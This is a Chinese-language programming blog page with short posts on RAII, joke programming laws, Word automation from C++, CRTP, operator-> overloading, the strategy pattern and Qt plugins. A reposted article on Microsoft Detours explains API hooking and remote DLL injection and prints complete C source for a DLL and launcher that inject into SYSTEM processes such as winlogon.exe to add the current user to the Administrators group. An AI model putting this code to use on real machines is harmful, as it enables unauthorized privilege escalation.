RAII是什么？來源于金慶的專欄

摘自《Extended STL》中譯

RAII：資源獲取即初始化

資源獲取即初始化（RAII, Resource Acquisition Is Initialization）是指，當你獲得一個資源的時候，不管這個資源是對象、內存、文件句柄或者其它什么，你都會在一個對象的構造函數中獲得它，并且在該對象的析構函數中釋放它。實現這種功能的類，我們就說它采用了"資源獲取即初始化（RAII）"的方式。這樣的類常常被稱為封裝類。

可以依據資源可變性和資源來源這兩個特征，來對RAII進行分類。

資源可變性

如果一個封裝類對其實例提供額外的功能，使得其實例能被賦予新資源，這個類表現出的這種特征即稱為"可變的RAII"，否則就是"不可變的RAII"。

不可變的RAII，是使用起來最簡單的一種。說它簡單，是因為在這種情況下，無需在封裝類中提供用于指定資源的方法--不管是新分配的資源，還是對其他資源進行拷貝。這種RAII還意味著，類的析構函數總是可以假定，被封裝的資源是有效的。

與此相反，提供可變的RAII的類，就需要實現下列功能中的絕大部分，或者全部：缺省的或者空的構造函數，拷貝構造函數，拷貝賦值操作，用于指定資源的方法。最重要的是，這樣的類在析構函數和任何類似close()的方法中，釋放資源前，都必須檢測被封裝的資源是不是null。

資源來源

對于提供RAII的類來說，第二個重要的特征是，它們通過什么途徑獲取自己所管理的資源。以std::string為代表的類，使用的是內部初始化的RAII：它管理的資源--即內存中用于保存字符的緩沖區--是由它自己創建的，這一資源對外永遠是不可見的。與此不同的是，以std::auto_ptr為代表的類表現出外部初始化的RAII行為：它所管理的資源，是使用它的客戶程序（通過另外的某種方式獲得之后）交給它的。

內部初始化的RAII的封裝類，一般比較容易實現，但是功能上也比較受限制，因為它們獲取資源的機制是預先定義好的，并且是固定不變的。不過，這樣的類用起來也容易一些，或者說，比較難被誤用：因為客戶代碼幾乎沒有機會犯下能導致資源泄露的錯誤。

posted @ 2010-11-06 17:30 codeArt 閱讀(743) | 評論 (0) | 編輯 收藏

編程法則(轉自oschina.net)有意思

1. 任何程序一旦部署即顯陳舊。
2. 修改需求規范來適應程序比反過來做更容易。
3. 一個程序如果很有用，那它注定要被改掉。
4. 一個程序如果沒用，那它一定會有很好的文檔。
5. 任何程序里都僅僅只有10%的代碼會被執行到。
6. 軟件會一直膨脹到耗盡所有資源為止。
7. 任何一個有點價值的程序里都會有至少一個bug。
8. 原型完美的程度跟審視的人數成反比，反比值會隨著涉及的資金數增大。
9. 軟件直到被變成產品運行至少6個月后，它最嚴重的問題才會被發現。
10. 無法檢測到的錯誤的形式無限多樣，而能被檢測到的正好相反，被定義了的十分有限。
11. 修復一個錯誤所需要投入的努力會隨著時間成指數級增加。
12. 軟件的復雜度會一直增加，直到超出維護這個程序的人的承受能力。
13. 任何自己的程序，幾個月不看，形同其他人寫的。
14. 任何一個小程序里面都有一個巨大的程序蠢蠢欲出。
15. 編碼開始的越早，花費的時間越長。
16. 一個粗心的項目計劃會讓你多花3倍的時間去完成；一個細心的項目計劃只會讓你多花2倍的時間。
17. 往大型項目里添加人手會使項目更延遲。
18. 一個程序至少會完成90%，但永遠完成不了超過95%。
19. 如果你想麻煩被自動處理掉，你得到的是自動產生的麻煩。
20. 開發一個傻瓜都會使用的軟件，只有傻瓜愿意使用它。
21. 用戶不會真正的知道要在軟件里做些什么，除非使用過。

posted @ 2010-09-30 23:42 codeArt 閱讀(247) | 評論 (0) | 編輯 收藏

c++操作word接口

注意事項：1多用Range，少用Selection，因為Word中，Selection對象只有一個。
【1】開啟word
【2】新建一個文檔
【3】設置文檔的頁面布局
【4】插入文本
【5】插入文本框
【6】文本框中插入文本
【7】設置文本框的屬性
【8】插入圖片，這里需要注意，必須得先用InlineShape,這樣可以把圖片插入到指定的頁中，不然，所有的圖片只在第一頁。
【9】插入直線
【10】插入分隔符

【11】設置欄目個數和欄目的寬度
這里一定要注意add函數的邏輯
【12】插入表格
【13】保存文檔并退出
在word優秀的構架中還有許許多多的接口，上面只是舉例實現一個普通的文檔，希望對大家有用。

posted @ 2010-08-31 19:35 codeArt 閱讀(9028) | 評論 (4) | 編輯 收藏

C++的繼承

 

 

posted @ 2010-08-31 01:32 codeArt 閱讀(339) | 評論 (0) | 編輯 收藏

關于Detours[轉]

Detours是微軟開發的一個函數庫（源代碼可在http://research.microsoft.com/sn/detours 免費獲得）, 用于修改運行中的程序在內存中的影像，從而即使沒有源代碼也能改變程序的行為。具體用途是：

攔截WIN32 API調用，將其引導到自己的子程序，從而實現WIN32 API的定制。
為一個已在運行的進程創建一新線程，裝入自己的代碼并運行。
本文將簡介Detours的原理，Detours庫函數的用法， 并利用Detours庫函數在Windows NT上編寫了一個程序，該程序能使有“調試程序”的用戶權限的用戶成為系統管理員，附錄利用Detours庫函數修改該程序使普通用戶即可成為系統管理員（在NT4 SP3上）。

一． Detours的原理

1． WIN32進程的內存管理

總所周知，WINDOWS NT實現了虛擬存儲器，每一WIN32進程擁有4GB的虛存空間， 關于WIN32進程的虛存結構及其操作的具體細節請參閱WIN32 API手冊， 以下僅指出與Detours相關的幾點：

(1) 進程要執行的指令也放在虛存空間中
(2) 可以使用QueryProtectEx函數把存放指令的頁面的權限更改為可讀可寫可執行，再改寫其內容，從而修改正在運行的程序
(3) 可以使用VirtualAllocEx從一個進程為另一正運行的進程分配虛存，再使用 QueryProtectEx函數把頁面的權限更改為可讀可寫可執行，并把要執行的指令以二進制機器碼的形式寫入，從而為一個正在運行的進程注入任意的代碼

2． 攔截WIN32 API的原理

Detours定義了三個概念：

(1) Target函數：要攔截的函數，通常為Windows的API。
(2) Trampoline函數：Target函數的復制品。因為Detours將會改寫Target函數，所以先把Target函數復制保存好，一方面仍然保存Target函數的過程調用語義，另一方面便于以后的恢復。
(3) Detour 函數：用來替代Target函數的函數。

Detours在Target函數的開頭加入JMP Address_of_ Detour_ Function指令（共5個字節）把對Target函數的調用引導到自己的Detour函數， 把Target函數的開頭的5個字節加上JMP Address_of_ Target _ Function+5作為Trampoline函數。例子如下：

攔截前：Target _ Function：
；Target函數入口，以下為假想的常見的子程序入口代碼
push   ebp
mov   ebp,   esp
push   eax
push   ebx
Trampoline:
；以下是Target函數的繼續部分
……

攔截后： Target _ Function：
jmp   Detour_Function
Trampoline:
；以下是Target函數的繼續部分
……

Trampoline_Function:
; Trampoline函數入口, 開頭的5個字節與Target函數相同
push   ebp
mov   ebp,   esp
push   eax
push   ebx
；跳回去繼續執行Target函數
jmp   Target_Function+5
3． 為一個已在運行的進程裝入一個DLL

以下是其步驟：

(1) 創建一個ThreadFuction，內容僅是調用LoadLibrary。
(2) 用VirtualAllocEx為一個已在運行的進程分配一片虛存，并把權限更改為可讀可寫可執行。
(3) 把ThreadFuction的二進制機器碼寫入這片虛存。
(4) 用CreateRemoteThread在該進程上創建一個線程，傳入前面分配的虛存的起始地址作為線程函數的地址，即可為一個已在運行的進程裝入一個DLL。通過DllMain 即可在一個已在運行的進程中運行自己的代碼。

二． Detours庫函數的用法

因為Detours軟件包并沒有附帶幫助文件，以下接口僅從剖析源代碼得出。

1． PBYTE WINAPI DetourFindFunction(PCHAR pszModule, PCHAR pszFunction)

功能：從一DLL中找出一函數的入口地址
參數：pszModule是DLL名，pszFunction是函數名。
返回：名為pszModule的DLL的名為pszFunction的函數的入口地址
說明：DetourFindFunction除使用GetProcAddress外，還直接分析DLL的文件頭，因此可以找到一些GetProcAddress找不到的函數入口。

2． DETOUR_TRAMPOLINE(trampoline_prototype, target_name)
功能：該宏把名為target_name 的Target函數生成Trampoline函數，以后調用 trampoline_prototype在語義上等于調用Target函數。

3． BOOL WINAPI DetourFunctionWithTrampoline(PBYTE pbTrampoline, BYTE pbDetour)
功能：用Detour 函數攔截Target函數
參數：pbTrampoline是DETOUR_TRAMPOLINE得到的trampoline_prototype，pbDetour是 Detour 函數的入口地址。

4． BOOL WINAPI DetourRemoveWithTrampoline(PBYTE pbTrampoline,PBYTE pbDetour)
功能：恢復Target函數
參數：pbTrampoline是DETOUR_TRAMPOLINE得到的trampoline_prototype，pbDetour是 Detour 函數的入口地址。

5． BOOL WINAPI ContinueProcessWithDll(HANDLE hProcess, LPCSTR lpDllName)
功能：為一個已在運行的進程裝入一個DLL
參數：hProcess是進程的句柄，lpDllName是要裝入的DLL名

三． 程序實例

以一個能使有“調試程序”的用戶權限的用戶成為系統管理員的程序做例子說明Detours 庫函數的用法。程序的設計思路是找一個以System帳號運行的進程，如spoolss.exe, rpcss.exe, winlogon.exe, service.exe等，使用ContinueProcessWithDll在其中注入把當前用戶加入到 Administrators本地組的DLL，因為該DLL在這些進程的安全上下文環境運行，所以有相應的權限。

先編寫相應的DLL：

/*admin.dll, 當進程裝入時會把名為szAccountName
的用戶加入到Administrators本地組。*/

#include
#include
#include
#include

/*以下創建一共享段實現進程間的數據通訊，
szAccountName 是用戶名，bPrepared說明
szAccountName是否已初始化。*/

#pragma data_seg(".MYSHARE")
BOOL bPrepared=FALSE;
wchar_t szAccountName[100]={0};
#pragma data_seg()

#pragma comment(linker, "/SECTION:.MYSHARE,RWS")

/*程序調用SetAccountName設置要加入到Administrators
本地組的用戶名，并通知DllMain
已初始化szAccountName ，
以后被裝入時可調用ElevatePriv */

__declspec(dllexport) VOID WINAPI
SetAccountName(wchar_t *Name)
{
    wcscpy(szAccountName,Name);
    bPrepared=TRUE;
}

/*把名為szAccountName的用戶加入
到Administrators本地組*/

__declspec(dllexport) VOID WINAPI ElevatePriv()
{
    LOCALGROUP_MEMBERS_INFO_3 account;
    account.lgrmi3_domainandname=szAccountName;
    NetLocalGroupAddMembers(NULL,L"Administrators",
        3,(LPBYTE)&account,1);
}

__declspec(dllexport) ULONG WINAPI
DllMain(HINSTANCE hInstance,
        DWORD dwReason, PVOID lpReserved)
{
    switch (dwReason) {
   case DLL_THREAD_ATTACH:
       if (bPrepared)
           ElevatePriv();
    }
    return TRUE;
}

程序如下：

/*AddMeToAdministrators.exe 把當前用戶加入到
Administrators本地組。使用方法為：（1）
運行任務管理器找到spoolss.exe或rpcss.exe或winlogon.exe或sevice.exe的進程ID （2）執行AddMeToAdministrators.exe procid, 其中procid為（1）記下的進程ID （3）簽退再簽到，運行用戶管理器，即可發現自己已在Administrators本地組中。*/

#include
#include
#include
#include
#include

extern VOID WINAPI SetAccountName(wchar_t *Name);

/* GetCurrentUser得到自己的用戶名稱*/

void GetCurrentUser(wchar_t *szName)
{
    HANDLE hProcess, hAccessToken;
    wchar_t InfoBuffer[1000],szAccountName[200],
        szDomainName[200];
    PTOKEN_USER pTokenUser = (PTOKEN_USER)InfoBuffer;
    DWORD dwInfoBufferSize,dwAccountSize = 200,
        dwDomainSize = 200;
    SID_NAME_USE snu;

    hProcess = GetCurrentProcess();

    OpenProcessToken(hProcess,TOKEN_READ,&hAccessToken);

    GetTokenInformation(hAccessToken,TokenUser,
        InfoBuffer,
        1000, &dwInfoBufferSize);

    LookupAccountSid(NULL, pTokenUser->User.Sid,
        szAccountName,
        &dwAccountSize,szDomainName, &dwDomainSize, &snu);
    wcscpy(szName,szDomainName);
    wcscat(szName,L"\");
        wcscat(szName,szAccountName);
}

/* EnablePrivilege啟用自己的“調試程序”的用戶權限*/

BOOL EnablePrivilege(LPCTSTR szPrivName,BOOL fEnable)
{
    HANDLE hToken;
    if (!OpenProcessToken(GetCurrentProcess(),
        TOKEN_ADJUST_PRIVILEGES, &hToken))
        return FALSE;
    TOKEN_PRIVILEGES tp;
    tp.PrivilegeCount = 1;
    LookupPrivilegeValue(NULL, szPrivName,
        &tp.Privileges[0].Luid);
    tp.Privileges[0].Attributes = fEnable ?
SE_PRIVILEGE_ENABLED : 0;
    AdjustTokenPrivileges(hToken, FALSE, &tp,
        sizeof(tp), NULL, NULL);
    return((GetLastError() == ERROR_SUCCESS));
}

int WINAPI WinMain(HINSTANCE hinst, HINSTANCE hprev,
                   LPSTR lpszCmdLine, int
                   nCmdShow)
{
    INT argc;
    WCHAR **argv;
    argv = CommandLineToArgvW(GetCommandLineW(),
        &argc);
    INT nProcessId = -1;
    if (argc!=2){
        wprintf(L"usage %s pid", argv[0]);
        return 1;
    }
    nProcessId = _wtoi(argv[1]);
    printf("%d ",nProcessId);
    /*要成功執行ContinueProcessWithDll，要對winlogon.exe等進程的進程句柄有讀寫存儲器內容和創建線程的權限，EnablePrivilege使本進程有這樣的權利。*/

    if (!EnablePrivilege(SE_DEBUG_NAME, TRUE)){
        printf("AdjustTokenPrivilege Fail %u ",
            (UINT)GetLastError());
        return 1;
    }
    HANDLE   gNewHandle =
        OpenProcess(PROCESS_ALL_ACCESS
        , TRUE, nProcessId);
    if (!gNewHandle){
        printf("OpenProcess Fail %u ",
            (UINT)GetLastError());
        return 1;
    }
    wchar_t szName[100];
    GetCurrentUser(szName);
    SetAccountName(szName);
    If (!ContinueProcessWithDll(gNewHandle,
        L"c:\temp\admin.dll")) {
            printf("ContinueProcessWithDll failed %u",
                (UINT)GetLastError());
            return 3;
    }
    return 0;
}
因為“調試程序”的用戶權限缺省情況下僅賦予給管理員，因此并不會造成安全漏洞。但該程序揭示出“調試程序”的用戶權限其實是至高無上的用戶權限，只能授予給可信用戶。

四． 結論      Detours是一強大的工具，提供了簡單易用的函數接口來攔截WIN32 API調用和為一個已在運行的進程裝入一個DLL。

posted @ 2010-08-29 23:08 codeArt 閱讀(615) | 評論 (0) | 編輯 收藏

QT中的插件

     摘要:   QT有著獨特的插件管理方法便于使用,調理清晰.完全可以替代WIN32下的動態庫,靜態庫.不過,QT也支持動態庫和靜態庫加載 .見QLibrary,最終,QLibrary調用WIN32下的LoadLibrary,GetProcAddress函數. Qt插件的使用方法: [1]project_main_1工程中定義接口 class interface__1{publ...  閱讀全文

posted @ 2010-08-28 19:56 codeArt 閱讀(5714) | 評論 (0) | 編輯 收藏

努力,從現在開始

之前寫blog只是備忘,看了一些很好的技術文章之后,很是羨慕.從現在開始,好好的維護這個blog啦.

posted @ 2010-08-28 16:15 codeArt 閱讀(211) | 評論 (0) | 編輯 收藏

用在COM中，類行為比較怪異的代碼

#include <iostream>

using namespace std;

template <typename T>
class Base {
public:
	void fun() {
		cout << "Base::fun" << endl;
	}

	void doSomething() {
		T* pT = static_cast<T*>(this);
		pT->fun();
	}
};

class Drive : public Base<Drive> {
public:
	void fun() {
		cout << "Drive::fun" << endl;
	}
};

class MostDrive : public Drive {
public:
	void fun() {
		cout << "MostDrive::fun" << endl;
	}
};

int main() {
	MostDrive obj;
	obj.doSomething();

	return 0;
}

posted @ 2010-08-27 21:02 codeArt 閱讀(308) | 評論 (0) | 編輯 收藏

c++重載->

#include <iostream>

using namespace std;

class Inner {
public:
	void Fun() {
		cout << "Inner::Fun" << endl;
	}
};

class Outer {
private:
	Inner* m_pInner;

public:
	Outer(Inner* p_pInner) : m_pInner(p_pInner) {
	}

	Inner* operator -> () {
		return m_pInner;
	}
};

int main() {
	Inner objInner;
	Outer objOuter(&objInner);

	objOuter->Fun();

	return 0;
}

posted @ 2010-08-27 20:46 codeArt 閱讀(208) | 評論 (0) | 編輯 收藏

策略模式c++表述備忘

#include <iostream>

using namespace std;

class Round1 {
public:
	void Play() {
		cout << "Round1::Play" << endl;
	}
};

class Round2 {
public:
	void Play() {
		cout << "Round2::Play" << endl;
	}
};

template <typename T>
class Strategy {
private:
	T objT;
public:
	void Play() {
		objT.Play();
	}
};

int main() {
	Strategy<Round1> obj1;
	Strategy<Round2> obj2;

	obj1.Play();
	obj2.Play();

	return 0;
}

posted @ 2010-08-27 20:43 codeArt 閱讀(297) | 評論 (0) | 編輯 收藏